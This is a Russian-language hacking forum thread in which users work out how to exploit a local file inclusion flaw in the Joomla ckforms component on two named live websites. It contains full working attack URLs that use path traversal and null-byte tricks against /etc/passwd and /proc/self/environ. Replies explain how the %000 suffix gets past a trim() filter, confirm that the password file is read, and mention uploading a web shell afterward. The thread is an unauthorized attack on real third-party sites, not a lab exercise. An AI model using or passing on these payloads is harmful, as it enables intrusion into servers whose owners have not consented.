Спасибо! Если можно, то объясните что значат всякие буквы после proc? Насколько помню, там хранятся логи, которые постоянно обновляются.

И кстати, как можно обойти эту расчлененку? Режутся слеши и нулевой байт.

http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&It emid=30&controller=../../../../../../../../../etc/passwd

Я бы с удовольствием объяснил, но из меня никудышный педагог Я могу накидать вам список статей по локальному PHP инклуду в личку, если понадобится, но вообще это все легко гуглится по запросу "/proc/self/environ инклуд", и уже на первой странице выдачи вы найдете всю информацию.

Удачи.

После /proc это не логи и ничего похожего на них. В ряде unix систем /proc - это виртуальная файловая система представляющая собой интерфейс для динамической работы с ядром.

А как обойти это расчленение?

http://shop.ego-dom.ru/index.php?option=com_ckforms&view=ckforms&id=17&It emid=30&controller=../../../../../../../../../etc/passwd

Попробуйте поискать уязвимости в других скриптах этого сайта. Может статься так, что какой-либо фильтр не дает произвести требуемую операцию. Так-же можно попробовать переопределение переменных в случае register_globals On. Но так как там хостинг, то последний вариант маловероятен.

Я сегодня первый раз lfi решил использовать в деле, поэтому много камней мне попадается.

Вот например, если запрос с %00 на конце, то подставляется .php, а если %000, то .php не подставляется, но и ошибка вылетает...

http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../proc/self/environ%00

http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../proc/self/environ%000

Вы углубляетесь в детали После успешно проведенной атаки и заливки шелла(я нисколько не сомневаюсь, чтобы потом уведомить админов уязвимого ресурса о бреши в их защите ), многие вопросы отпадут сами собой - практика лучше всего. Что касается вашего вопроса про %00 - просто примите это как данность. Нулл-байт(ядовитый нуль, 0x00) пришел из мира C/C++ и означает конец строки.

Да действительно. Фильтр очень ограниченный и явно самопальный работает. Не происходит подстановка в варианте с %000 потому что фильтр не воспринимает как null-byte.

Вообще ,в данном случае ,редкая криворукость программиста играет нам на руку. Так как %000 обрабатывается php как %00 и усечение все-же происходит. Ошибку выдает потому, что нет прав на виртуальную файловую систему.

Но запрос вида http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../etc/passwd%000 успешно отображает passwd.

Причем тут фильтр?

Там банально идет trim(), который убирает нульбайт, если он идет в конце строки, поэтому правильнее всегда после нульбайта подставлять символ какой-нибудь.

Фильтры, ага. =\